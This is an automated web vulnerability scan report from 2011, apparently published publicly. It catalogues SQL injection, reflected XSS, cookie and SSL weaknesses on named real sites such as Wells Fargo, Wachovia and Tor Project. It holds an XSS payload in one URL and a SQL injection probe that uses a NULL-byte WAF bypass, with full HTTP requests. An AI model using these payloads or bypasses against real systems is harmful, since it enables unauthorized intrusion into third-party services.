XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-02

Report generated by XSS.CX at Wed Jul 20 07:31:55 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786 [REST URL parameter 3]

1.2. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858 [REST URL parameter 2]

1.3. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 1]

1.4. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 2]

1.5. http://networkpresence.com.au/index.php/Services/ [REST URL parameter 2]

1.6. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 2]

1.7. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 3]

1.8. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 4]

1.9. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 5]

1.10. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 1]

1.11. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 2]

1.12. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 3]

1.13. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 4]

1.14. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 5]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

2.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

2.3. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

2.4. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

2.5. http://networkpresence.com.au/index.php/Services/ [name of an arbitrarily supplied request parameter]

2.6. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [h parameter]

2.7. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [sw parameter]

2.8. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [w parameter]

2.9. https://secure2.internode.on.net/nodestore/cart/build [REST URL parameter 3]

2.10. https://secure2.internode.on.net/nodestore/cart/save/order/ [REST URL parameter 3]

2.11. https://secure2.internode.on.net/nodestore/cart/save/order/undefined [REST URL parameter 3]

2.12. https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a [REST URL parameter 3]

2.13. http://www.codero.com/images/design/banner-green-bundle.png [REST URL parameter 1]

2.14. http://www.codero.com/images/design/banner-priceMatch.png [REST URL parameter 1]

2.15. http://www.codero.com/images/design/banner_50off-promo.png [REST URL parameter 1]

2.16. http://www.codero.com/images/design/banner_certified-expertise.png [REST URL parameter 1]

2.17. http://www.codero.com/images/design/banner_i7-promo.png [REST URL parameter 1]

2.18. http://www.codero.com/images/design/menu_i7-promo.png [REST URL parameter 1]

2.19. http://www.codero.com/images/design/rc_i7-promo.jpg [REST URL parameter 1]

2.20. http://www.printfection.com/torprojectstore [name of an arbitrarily supplied request parameter]

2.21. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [REST URL parameter 3]

2.22. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [name of an arbitrarily supplied request parameter]

2.23. https://www.wellsfargo.com/locator/atm/search [txtCity parameter]

2.24. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

2.25. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

3. Flash cross-domain policy

3.1. http://ad.doubleclick.net/crossdomain.xml

3.2. https://adfarm.mediaplex.com/crossdomain.xml

3.3. http://b.scorecardresearch.com/crossdomain.xml

3.4. http://c.atdmt.com/crossdomain.xml

3.5. http://c.scout.com/crossdomain.xml

3.6. http://cdn-cms.scout.com/crossdomain.xml

3.7. http://dev.virtualearth.net/crossdomain.xml

3.8. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

3.9. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

3.10. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

3.11. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

3.12. http://img1.catalog.video.msn.com/crossdomain.xml

3.13. http://img2.catalog.video.msn.com/crossdomain.xml

3.14. http://img3.catalog.video.msn.com/crossdomain.xml

3.15. http://img4.catalog.video.msn.com/crossdomain.xml

3.16. http://minerva.healthcentral.com/crossdomain.xml

3.17. http://sensor2.suitesmart.com/crossdomain.xml

3.18. http://static.suitesmart.com/crossdomain.xml

3.19. http://statse.webtrendslive.com/crossdomain.xml

3.20. http://t0.tiles.virtualearth.net/crossdomain.xml

3.21. http://www.scout.com/crossdomain.xml

3.22. http://feeds.bbci.co.uk/crossdomain.xml

3.23. http://googleads.g.doubleclick.net/crossdomain.xml

3.24. http://newsrss.bbc.co.uk/crossdomain.xml

3.25. http://server.iad.liveperson.net/crossdomain.xml

3.26. http://www.codero.com/crossdomain.xml

3.27. http://www.healthcentral.com/crossdomain.xml

3.28. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.3. http://c.atdmt.com/clientaccesspolicy.xml

4.4. http://c.scout.com/clientaccesspolicy.xml

4.5. http://dev.virtualearth.net/clientaccesspolicy.xml

4.6. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

4.7. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

4.8. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

4.9. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

4.10. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

4.11. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

4.12. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

4.13. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

4.14. http://minerva.healthcentral.com/clientaccesspolicy.xml

4.15. http://t0.tiles.virtualearth.net/clientaccesspolicy.xml

4.16. http://a1.bing4.com/clientaccesspolicy.xml

4.17. http://a2.bing4.com/clientaccesspolicy.xml

4.18. http://a4.bing4.com/clientaccesspolicy.xml

4.19. http://ts1.mm.bing.net/clientaccesspolicy.xml

4.20. http://ts2.mm.bing.net/clientaccesspolicy.xml

4.21. http://ts3.mm.bing.net/clientaccesspolicy.xml

4.22. http://ts4.mm.bing.net/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

5.2. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

6. Session token in URL

7. SSL certificate

7.1. https://adfarm.mediaplex.com/

7.2. https://www.torservers.net/

7.3. https://www.wellsfargoadvisors.com/

7.4. https://blog.torproject.org/

7.5. https://online.educaid.com/

7.6. https://online.wellsfargo.com/

7.7. https://onlineservices.wachovia.com/

7.8. https://secure.codero.com/

7.9. https://secure.internode.on.net/

7.10. https://secure2.internode.on.net/

7.11. https://wellsfargo.com/

7.12. https://wellsoffice.wellsfargo.com/

7.13. https://wfefs.wellsfargo.com/

7.14. https://www.torproject.org/

7.15. https://www.wachovia.com/

7.16. https://www.wellsfargo.com/

8. Cookie without HttpOnly flag set

8.1. https://www.wellsfargo.com/

8.2. http://b.scorecardresearch.com/b

8.3. http://bing.com/

8.4. http://c.atdmt.com/c.gif

8.5. http://c.bing.com/c.gif

8.6. http://odb.outbrain.com/utils/get

8.7. https://online.wellsfargo.com/das/signon

8.8. https://online.wellsfargo.com/signon

8.9. http://paid.outbrain.com/network/redir

8.10. http://sensor2.suitesmart.com/sensor4.js

8.11. http://server.iad.liveperson.net/hc/3194108/

8.12. http://server.iad.liveperson.net/hc/3194108/

8.13. http://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif

8.14. https://wellsoffice.wellsfargo.com/

8.15. http://www.bing.com/community/css-classnameexpansion.ashx

8.16. http://www.bing.com/events/search

8.17. http://www.bing.com/fd/AnswerBarHandler

8.18. http://www.bing.com/fd/InlineFeedbackHandler.aspx

8.19. http://www.bing.com/fd/ls/GLinkPing.aspx

8.20. http://www.bing.com/fd/ls/l

8.21. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

8.22. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

8.23. http://www.bing.com/maps/MapAppsScript.ashx

8.24. http://www.bing.com/maps/MapAppsScript.ashx

8.25. http://www.bing.com/maps/default.aspx

8.26. http://www.bing.com/maps/default.aspx

8.27. http://www.bing.com/news/s/news3B_c.css

8.28. http://www.bing.com/news/s/news3B_c.js

8.29. http://www.bing.com/news/s/news3S_c.css

8.30. http://www.bing.com/news/s/news3S_c.js

8.31. http://www.bing.com/videos/vthumb_c.css

8.32. http://www.printfection.com/torprojectstore

8.33. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139

8.34. http://www.rockhall.co.uk/10.html

8.35. http://www.rockhall.co.uk/ContactStyles

8.36. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

8.37. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

8.38. http://www.rockhall.co.uk/favicon.ico

8.39. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

8.40. https://www.wellsfargo.com/tas

9. Password field with autocomplete enabled

9.1. https://secure2.internode.on.net/nodestore/

9.2. https://secure2.internode.on.net/nodestore/checkout/customer/

9.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

9.4. https://wfefs.wellsfargo.com/boa/

9.5. https://wfefs.wellsfargo.com/eoa/

9.6. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

9.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

10. Referer-dependent response

11. Cross-domain POST

11.1. https://www.torservers.net/donate.html

11.2. https://www.torservers.net/donate.html

11.3. https://www.wellsfargoadvisors.com/

11.4. https://www.wellsfargoadvisors.com/js/branchLocator.js

11.5. https://www.wellsfargoadvisors.com/online-access/signon.htm

12. SSL cookie without secure flag set

12.1. https://online.wellsfargo.com/das/signon

12.2. https://online.wellsfargo.com/signon

12.3. https://secure.codero.com/order/v/shop

12.4. https://secure.codero.com/order/v/viewcart

12.5. https://secure.codero.com/vpublic/js/orderform-ws.php

12.6. https://www.wellsfargo.com/tas

13. Cookie scoped to parent domain

13.1. http://b.scorecardresearch.com/b

13.2. http://c.atdmt.com/c.gif

13.3. http://c.bing.com/c.gif

13.4. http://odb.outbrain.com/utils/get

13.5. https://online.wellsfargo.com/das/signon

13.6. https://online.wellsfargo.com/signon

13.7. http://paid.outbrain.com/network/redir

13.8. http://sensor2.suitesmart.com/sensor4.js

13.9. http://server.iad.liveperson.net/hc/3194108/

13.10. https://wellsoffice.wellsfargo.com/

13.11. http://www.bing.com/community/css-classnameexpansion.ashx

13.12. http://www.bing.com/events/search

13.13. http://www.bing.com/fd/AnswerBarHandler

13.14. http://www.bing.com/fd/InlineFeedbackHandler.aspx

13.15. http://www.bing.com/fd/ls/GLinkPing.aspx

13.16. http://www.bing.com/fd/ls/l

13.17. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

13.18. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

13.19. http://www.bing.com/maps/MapAppsScript.ashx

13.20. http://www.bing.com/maps/MapAppsScript.ashx

13.21. http://www.bing.com/maps/default.aspx

13.22. http://www.bing.com/maps/default.aspx

13.23. http://www.bing.com/news/s/news3B_c.css

13.24. http://www.bing.com/news/s/news3B_c.js

13.25. http://www.bing.com/news/s/news3S_c.css

13.26. http://www.bing.com/news/s/news3S_c.js

13.27. http://www.bing.com/videos/vthumb_c.css

13.28. https://www.wellsfargo.com/tas

14. Cross-domain Referer leakage

14.1. https://online.wellsfargo.com/das/channel/enrollDisplay

14.2. https://online.wellsfargo.com/signon

14.3. https://onlineservices.wachovia.com/auth/AuthService

14.4. https://onlineservices.wachovia.com/identity/IdentityMgr

14.5. https://onlineservices.wachovia.com/identity/IdentityMgr

14.6. https://secure.codero.com/order/v/shop

14.7. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

14.8. http://www.bing.com/ScriptResource.axd

14.9. http://www.bing.com/WebResource.axd

14.10. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

14.11. https://www.wellsfargo.com/locator/atm/search

15. Cross-domain script include

15.1. https://onlineservices.wachovia.com/auth/AuthService

15.2. https://onlineservices.wachovia.com/identity/IdentityMgr

15.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

15.4. http://www.defaultroute.com/

15.5. http://www.defaultroute.com/category/founders/

15.6. http://www.defaultroute.com/services/thenetwork/

15.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

15.8. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

15.9. http://www.healthcentral.com/common/js/healthcentral_common.js

15.10. http://www.rockhall.co.uk/ContactStyles

15.11. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

15.12. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

15.13. http://www.rockhall.co.uk/favicon.ico

15.14. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

15.15. https://www.wellsfargo.com/locator/atm/search

15.16. https://www.wellsfargoadvisors.com/online-access/signon.htm

16. File upload functionality

17. TRACE method is enabled

17.1. https://blog.torproject.org/

17.2. http://networkpresence.com.au/

17.3. http://sensor2.suitesmart.com/

17.4. http://www.defaultroute.com/

17.5. https://www.wellsfargoadvisors.com/

18. Email addresses disclosed

18.1. http://ads1.msads.net/library/dap.js

18.2. http://ads1.msn.com/library/dap.js

18.3. https://onlineservices.wachovia.com/identity/IdentityMgr

18.4. https://secure2.internode.on.net/nodestore/checkout/customer/

18.5. http://widgets.twimg.com/j/2/widget.css

18.6. http://widgets.twimg.com/j/2/widget.js

18.7. http://www.codero.com/css/screen.css

18.8. http://www.codero.com/css/style.css

18.9. http://www.codero.com/js/hoverIntent.js

18.10. http://www.defaultroute.com/

18.11. http://www.defaultroute.com/category/founders/

18.12. http://www.defaultroute.com/services/thenetwork/

18.13. https://www.torservers.net/donate.html

18.14. https://www.wachovia.com/common_files/metrics/vignette/stats.js

18.15. https://www.wellsfargo.com/help/

18.16. https://www.wellsfargo.com/privacy_security/

18.17. https://www.wellsfargo.com/privacy_security/fraud/

18.18. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

18.19. https://www.wellsfargoadvisors.com/js/contactUsFA.js

19. Robots.txt file

19.1. http://a1.bing4.com/imagenewsfetcher.aspx

19.2. http://a2.bing4.com/imagenewsfetcher.aspx

19.3. http://a4.bing4.com/imagenewsfetcher.aspx

19.4. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

19.5. https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5

19.6. http://api.twitter.com/1/statuses/user_timeline.json

19.7. http://b.scorecardresearch.com/b

19.8. https://blog.torproject.org/images/favicon.ico

19.9. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx

19.10. http://cdn-forums.scout.com/adfeed.ashx

19.11. http://feeds.bbci.co.uk/news/rss.xml

19.12. http://fonts.googleapis.com/css

19.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1031455071/

19.14. http://l.addthiscdn.com/live/t00/250lo.gif

19.15. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

19.16. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

19.17. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

19.18. http://odb.outbrain.com/utils/ping.html

19.19. https://online.wellsfargo.com/signon

19.20. http://paid.outbrain.com/favicon.ico

19.21. https://secure.codero.com/order/v/shop

19.22. https://secure2.internode.on.net/nodestore

19.23. http://sensor2.suitesmart.com/sensor4.js

19.24. http://static.suitesmart.com/cs/99845/tags/dfa.js

19.25. http://themes.googleusercontent.com/static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff

19.26. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

19.27. http://www.codero.com/images/design/menu_i7-promo.png

19.28. http://www.defaultroute.com/

19.29. http://www.google-analytics.com/__utm.gif

19.30. http://www.googleadservices.com/pagead/conversion/1031455071/

19.31. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

19.32. http://www.internode.on.net/

19.33. http://www.printfection.com/torprojectstore

19.34. http://www.rockhall.co.uk/ContactStyles

19.35. http://www.scout.com/favicon.ico

19.36. https://www.torproject.org/

19.37. https://www.torservers.net/

19.38. https://www.wachovia.com/enroll

19.39. http://www.wellsfargo.com/favicon.ico

19.40. https://www.wellsfargo.com/

19.41. https://www.wellsfargoadvisors.com/

20. Cacheable HTTPS response

20.1. https://onlineservices.wachovia.com/favicon.ico

20.2. https://onlineservices.wachovia.com/ols/css/interference.css

20.3. https://www.torproject.org/

20.4. https://www.torproject.org/css/master.css

20.5. https://www.torproject.org/docs/documentation.html.en

20.6. https://www.torservers.net/

20.7. https://www.torservers.net/donate.html

20.8. https://www.wachovia.com/

20.9. https://www.wachovia.com/enroll

20.10. https://www.wachovia.com/files/pres/interference.css

20.11. https://www.wachovia.com/foundation/v/index.jsp

20.12. https://www.wachovia.com/miscpop1197

20.13. https://www.wachovia.com/retirementlogin

20.14. https://www.wellsfargo.com/careers/

20.15. https://www.wellsfargo.com/com/contact_us_form

20.16. https://www.wellsfargo.com/com/rcbo_locator/search

20.17. https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial

20.18. https://www.wellsfargo.com/help/

20.19. https://www.wellsfargo.com/help/faqs/signon_faqs

20.20. https://www.wellsfargo.com/locator/atm/search

20.21. https://www.wellsfargo.com/locator/atm/services

20.22. https://www.wellsfargo.com/pi_action/rcboLocator

20.23. https://www.wellsfargo.com/privacy_security/

20.24. https://www.wellsfargo.com/privacy_security/fraud/

20.25. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

20.26. https://www.wellsfargo.com/products_services/applications_viewall

20.27. https://www.wellsfargo.com/search/search

20.28. https://www.wellsfargo.com/sitemap/

20.29. https://www.wellsfargo.com/tas

20.30. https://www.wellsfargo.com/wachovia/access

20.31. https://www.wellsfargo.com/wachovia/retirementplan/amp

20.32. https://www.wellsfargo.com/wachovia/retirementplan/wrs

20.33. https://www.wellsfargo.com/wachovia/student

20.34. https://www.wellsfargoadvisors.com/

20.35. https://www.wellsfargoadvisors.com/conversion/signon-decision.htm

20.36. https://www.wellsfargoadvisors.com/favicon.ico

20.37. https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm

20.38. https://www.wellsfargoadvisors.com/online-access/signon.htm

20.39. https://www.wellsfargoadvisors.com/wfa/username-password-help.htm

21. Multiple content types specified

22. HTML does not specify charset

22.1. http://ds.addthis.com/red/psi/sites/www.healthcentral.com/p.json

22.2. http://odb.outbrain.com/utils/ping.html

22.3. http://sensor2.suitesmart.com/sensor4.js

22.4. http://www.internode.on.net/js/promo-config-20080613.php

22.5. https://www.wachovia.com/

23. Content type incorrectly stated

23.1. https://onlineservices.wachovia.com/favicon.ico

23.2. https://onlineservices.wachovia.com/ols/css/interference.css

23.3. http://sc1.maps.live.com/i/bin/20110629.2253/action_item_bullet.gif

23.4. https://secure.codero.com/vpublic/js/orderform-ws.php

23.5. http://sensor2.suitesmart.com/sensor4.js

23.6. http://server.iad.liveperson.net/hcp/html/mTag.js

23.7. http://t0.tiles.virtualearth.net/tiles/dp/content

23.8. http://www.bing.com/fd/AnswerBarHandler

23.9. http://www.bing.com/getimage

23.10. http://www.bing.com/maps/default.aspx

23.11. http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico

23.12. http://www.internode.on.net/js/promo-config-20080613.php

23.13. http://www.printfection.com/favicon.ico

23.14. https://www.torproject.org/css/master.css

23.15. https://www.wachovia.com/files/pres/interference.css

23.16. https://www.wellsfargo.com/img/ads/smedia.JPG

23.17. https://www.wellsfargo.com/img/locator/results_wachovia_box.jpg

23.18. https://www.wellsfargo.com/img/locator/results_wellsfargo_box.jpg

23.19. https://www.wellsfargoadvisors.com/favicon.ico

24. Content type is not specified

24.1. http://paid.outbrain.com/network/redir

24.2. https://wfefs.wellsfargo.com/eoa/common/scripts/utility/utility_scripts.js



1. SQL injection  next
There are 14 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786 [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cmi-choicemediacom%00'/1/H.6-pdv-2/thcn26357876497786?[AQB]&ndh=1&t=18/6/2011%2020%3A59%3A1%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Feeling%20Low%20Self-Worth&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&r=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&cc=USD&ch=ADHD%20Vertical&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CFeeling%20Low%20Self-Worth&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=2&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Feeling%20Low%20Self-Worth&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&c12=2011-07-18&c37=PROMOSLIDE&pid=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&pidt=1&oid=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit&ot=A&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:10:53 GMT
Server: Omniture DC/2.0.0
Content-Length: 426
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cmi-choicemediacom was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cmi-choicemediacom%00''/1/H.6-pdv-2/thcn26357876497786?[AQB]&ndh=1&t=18/6/2011%2020%3A59%3A1%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Feeling%20Low%20Self-Worth&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&r=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&cc=USD&ch=ADHD%20Vertical&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CFeeling%20Low%20Self-Worth&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=2&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Feeling%20Low%20Self-Worth&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&c12=2011-07-18&c37=PROMOSLIDE&pid=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&pidt=1&oid=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit&ot=A&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
